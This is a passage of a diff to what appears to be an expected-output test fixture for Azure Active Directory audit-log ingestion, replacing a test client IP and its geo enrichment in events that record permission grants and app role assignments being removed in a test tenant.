"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:16:18\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2e358876-29c8-45b5-8dba-e233cf769988\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:16:18.9844570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"Z4XUI\"},{\"Name\":\"env_seqNum\",\"Value\":\"43649666\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##b2c3071c-9589-469b-9fb1-9311682625c0_00000000-0000-0000-0000-000000000000_b2c3071c-9589-469b-9fb1-9311682625c0\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR581\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ec6ba716-ec04-460a-8d9e-661d732c4689\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Remove OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125048500Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:16:18\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2e358876-29c8-45b5-8dba-e233cf769988\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:16:18.9844570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"Z4XUI\"},{\"Name\":\"env_seqNum\",\"Value\":\"43649666\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##b2c3071c-9589-469b-9fb1-9311682625c0_00000000-0000-0000-0000-000000000000_b2c3071c-9589-469b-9fb1-9311682625c0\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR581\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ec6ba716-ec04-460a-8d9e-661d732c4689\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Remove OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -7968,25 +7284,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -8000,7 +7298,7 @@ "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -8136,7 +7434,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -8148,12 +7446,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036337600Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:17:00\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"b2484c3c-5461-43ab-850b-70fccf706796\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:00.2133065Z\"},{\"Name\":\"env_epoch\",\"Value\":\"OLE3R\"},{\"Name\":\"env_seqNum\",\"Value\":\"55908032\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR551\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"31d7436e-85aa-4aee-a945-6a0ff51ea975\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125054Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:00\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"b2484c3c-5461-43ab-850b-70fccf706796\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:00.2133065Z\"},{\"Name\":\"env_epoch\",\"Value\":\"OLE3R\"},{\"Name\":\"env_seqNum\",\"Value\":\"55908032\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR551\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"31d7436e-85aa-4aee-a945-6a0ff51ea975\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -8179,25 +7477,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -8211,7 +7491,7 